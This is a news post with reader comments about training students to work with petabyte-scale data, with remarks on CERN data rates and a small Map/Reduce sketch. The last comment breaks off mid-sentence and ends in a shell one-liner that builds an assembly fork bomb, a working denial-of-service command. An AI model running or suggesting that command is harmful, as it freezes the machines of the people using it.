Getting Students To Think At Internet Scale
Hugh Pickens writes "The NY Times reports that researchers and workers in fields as diverse as biotechnology, astronomy, and computer science will soon find themselves overwhelmed with information, so the next generation of computer scientists will have to learn to think in terms of Internet scale: petabytes of data. For the most part, university students have used rather modest computing systems to support their studies, but these machines fail to churn through enough data to really challenge and train young minds to ponder the mega-scale problems of tomorrow. 'If they imprint on these small systems, that becomes their frame of reference and what they're always thinking about,' said Jim Spohrer, a director at IBM's Almaden Research Center. This year, the National Science Foundation funded 14 universities that want to teach their students how to grapple with big data questions. Students are beginning to work with data sets like the Large Synoptic Survey Telescope, the largest public data set in the world. The telescope takes detailed images of large chunks of the sky and produces about 30 terabytes of data each night. 'Science these days has basically turned into a data-management problem,' says Jimmy Lin, an associate professor at the University of Maryland."
I worked for one of the detectors at CERN, and I strongly agree with the notion of science being a data management problem. We (intend to :-) pull a colossal amount of data from the detectors (about 40 TB/sec in the case of the experiment I was working for). Unsurprisingly, not all of it can be stored. There's a dedicated group of people whose only job is to make sure that only relevant information is extracted, and another small group whose only job is to make sure that all this information can be stored, accessed, and processed at large scales. In short, a lot happens to the data before it is even seen by a physicist.
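To put the 40 TB/sec figure in perspective, here is a back-of-the-envelope sketch. It assumes the detector produces data around the clock at that rate and uses decimal units (1 EB = 1,000,000 TB); both are simplifying assumptions, not details from the experiment.

```python
# Rough daily volume at the quoted raw rate.
# Assumptions (not from the experiment): continuous running, decimal units.
TB_PER_SECOND = 40                  # raw detector rate quoted above
SECONDS_PER_DAY = 24 * 60 * 60      # 86,400 seconds

tb_per_day = TB_PER_SECOND * SECONDS_PER_DAY   # terabytes per day
eb_per_day = tb_per_day / 1_000_000            # exabytes per day (1 EB = 10^6 TB)

print(f"{tb_per_day:,} TB/day, about {eb_per_day:.2f} EB/day")
```

Under those assumptions that works out to millions of terabytes per day, which is why the filtering has to happen before anything is written to storage.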
Having said that, I agree that very few people have a real appreciation and/or understanding of these kinds of systems and even fewer have the required depth of knowledge to build them. But this tends to be a highly specialized area, and I can't imagine it's easy to study it as a generic subject.
That's not true. The way you solve the problem changes radically depending on the amount of data you have. Consider:
100 KB - You could use the dumbest algorithm imaginable and the slowest processor and everything is fine.
100 MB - Most embedded systems can happily manage it. A desktop system can handle it easily, even in a rather inefficient language. Algorithms are important.
100 GB - Big ass server - you'd definitely want to make sure you were using an efficient language and had an algorithm that scaled well, certainly to 2 processors and most likely to 4 processors. It should probably be 64-bit for efficiency.
100 PB+ - You'd want a Google-like system with lots of nodes. Actually, I think at this point the code would look nothing like the 100 MB case. I remember someone saying that Google is "just a hash table". I think that misses the point. Google has invented things like Map/Reduce and has custom file systems. They've also spent a lot of time trying to cut costs by studying the effects of temperature on failure rates.
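For anyone who hasn't seen the Map/Reduce style mentioned above, here is a minimal single-machine sketch of the idea using a word count. The function names (`map_phase`, `shuffle`, `reduce_phase`, `word_count`) are made up for illustration, and this is not Google's implementation; a real system would spread each phase across many nodes and a distributed file system.

```python
from collections import defaultdict

def map_phase(record):
    """Map: emit a (word, 1) pair for every word in one input record."""
    return [(word.lower(), 1) for word in record.split()]

def shuffle(pairs):
    """Shuffle: group all emitted values by key."""
    groups = defaultdict(list)
    for key, value in pairs:
        groups[key].append(value)
    return groups

def reduce_phase(key, values):
    """Reduce: collapse the values for one key into a single result."""
    return key, sum(values)

def word_count(records):
    # In a real cluster each record (or block of records) would be mapped
    # on a different node; here everything runs in one process.
    pairs = [pair for record in records for pair in map_phase(record)]
    return dict(reduce_phase(k, v) for k, v in shuffle(pairs).items())

counts = word_count(["big data", "Big science", "data data"])
print(counts)
```

The point of the structure is that the map and reduce steps are independent per record and per key, so they can be farmed out to as many machines as the data needs.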
Now I think these guys are spouting buzzwords. But if you want to process 100PB of data on
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;